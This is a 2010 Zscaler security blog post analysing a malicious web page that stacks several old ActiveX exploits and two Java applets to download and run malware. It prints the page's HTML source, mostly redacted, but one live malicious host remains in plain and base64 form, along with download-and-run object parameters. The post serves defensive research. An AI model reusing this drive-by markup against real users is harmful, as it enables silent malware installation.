Concerned about recent PAN-OS and other firewall/VPN CVEs? Take advantage of Zscaler’s special offer today
Read more

Blog Zscaler

Ricevi gli ultimi aggiornamenti dal blog di Zscaler nella tua casella di posta

Iscriviti
Ricerca sulla sicurezza

Remote Downloader ActiveX: Old Exploits, New Malware

image
JULIEN SOBRIER
aprile 26, 2010 - 4 Minuti di lettura
Approfondimenti sulla sicurezza

Contenuto

  1. Article
  2. Altri blog

ActiveX is a proprietary Microsoft technology, which allows developers to produce reusable software components. The controls are compatible with the Internet Explorer (IE) web browser and over the years have been a frequent security threat, as many developers have produced insecure ActiveX controls which can lead to the remote execution of code when a user with IE visits a malicious web page. This is a very powerful tool for attackers because everything happens in the background (no user interaction), and they can trigger exploitation with only a few lines of code.


I recently stumbled upon a page using no fewer than 8 different ActiveX exploits on the same page:

  • Rediff Bol Downloader ActiveX Control Remote Code Execution Vulnerability (2006, CVE-2006-6838)
  • Office OCX WordViewer.OCX Word Viewer ActiveX Multiple Vulnerabilities (2007, CVE-2007-2496)
  • Symantec AppStream Client 'LaunchObj' ActiveX Control Arbitrary File Download Vulnerability (2008, CVE-2008-4388)
  • Peachtree Accounting 'PAWWeb11.ocx' ActiveX Control Insecure Method Vulnerability (2008)
  • Multiple Office OCX ActiveX Controls 'OpenWebFile()' Arbitrary Program Execution Vulnerability (2009)
It also attempts to download 2 malicious Java applets.

These ActiveX controls attempt to download and install 2 malicious files. One is detected as malware by only 6 out of 40 antivirus engines, the other is detected by 18 antivirus engines.

Blow is the source of page (the malicious CLSIDs and files have been removed):


<html><body><object 
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="OpenWebFile" 
VALUE="hxxp://xxx/loading.php?spl=ActiveX_pack"></object> 
<object classid="clsid:BBBBBBBB-BBBB-BBBBB-BBBB-BBBBBBBBBBBB"> 
<PARAM NAME="OpenWebFile" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object> 
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA"> 
<PARAM NAME="OpenWebFile" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"> </object> 
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA5"> 
<PARAM NAME="OpenWebFile" 
VALUE="http://ally.serveblog.net//loading.php?spl=ActiveX_pack"> </object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="installAppMgr" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="PerformUpdateAsync" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<object classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA">
<PARAM NAME="ExecutePreferredApplication" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack"></object>
<OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" 
CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" 
CODEBASE="http://xxx/DownloaderActiveX.cab#Version=1,0,0,1"> 
<PARAM NAME="propProgressbackground" VALUE="#bccee8"> 
<PARAM NAME="propTextbackground" VALUE="#f7f8fc"> 
<PARAM NAME="propBarColor" VALUE="#df0203"> 
<PARAM NAME="propTextColor" VALUE="#000000"> 
<PARAM NAME="propWidth" VALUE="0"> 
<PARAM NAME="propHeight" VALUE="0"> 
<PARAM NAME="propDownloadUrl" 
VALUE="http://xxx/loading.php?spl=ActiveX_pack">
<PARAM NAME="propPostdownloadAction" VALUE="run">
<PARAM NAME="propInstallCompleteUrl" VALUE=""> 
<PARAM NAME="propbrowserRedirectUrl" VALUE=""> 
<PARAM NAME="propVerbose" VALUE="0"> 
<PARAM NAME="propInterrupt" VALUE="0"> </OBJECT> 
<OBJECT id="sysWIN" WIDTH=1 HEIGHT=1 
classid="clsid:AAAAAAAA-AAAA-AAAA-AAAA-AAAAAAAAAAAA" 
codebase="http://xxx/Bol.CAB"></OBJECT>
 
<script language="vbscript">
sysWIN.url = "http://xxx/loading.php?spl=ActiveX_pack"
sysWIN.fontsize = 10sysWIN.barcolor = 00FF00
sysWIN.start = "start"</script> 
<applet code="sklif.Hieeyfc.class" archive="j1_ke.jar" width="480" 
height="200"> 
<param name="data" VALUE="http://xxx/loading.php?spl=javadnwa&"> 
<param name="cc" value="1"> </applet> 
<applet width="100%" height="100%" code="Uutecwv" archive="j2_93.jar"> 
<param name="site" 
VALUE="aHR0cDovL2FsbHkuc2VydmVibG9nLm5ldC8vbG9hZGluZy5waHA/c3BsPWphdmFkbndiJg=="> 
</applet>


it is interesting to see that this page is using fairly old, and relatively well known, browser exploits along with state-of-the-art viruses virtually invisible to most antivirus software. Some people have argued that desktop antivirus protection alone is good enough because the exploit is just a means of delivering the malicious payload, and stopping this payload is all you need to do, in order to be protected. However, relying on a single layer of security is very risky. Catching the exploit can sometimes be easier, so you really need to take a defense-in-depth approach to security - patch your software, detect exploits, detect malicious payloads.

-- Julien
form submtited
Grazie per aver letto

Questo post è stato utile?

vote yes
Sì, molto utile!
vote no
Non proprio

Scopri altri blog di Zscaler

A cyber criminal shopping for malware
Agniane Stealer: Dark Web’s Crypto Threat
Leggi il blog
Business people walking through a city
The Impact of the SEC’s New Cybersecurity Policies
Leggi il blog
Digital cloud illuminated in blue
Security Advisory: Remote Code Execution Vulnerability (CVE-2023-3519)
Leggi il blog
TOITOIN Trojan
The TOITOIN Trojan: Analyzing a New Multi-Stage Attack Targeting LATAM Region
Leggi il blog
01 / 02
dots pattern

Ricevi gli ultimi aggiornamenti dal blog di Zscaler nella tua casella di posta

Inviando il modulo, si accetta la nostra Informativa sulla privacy.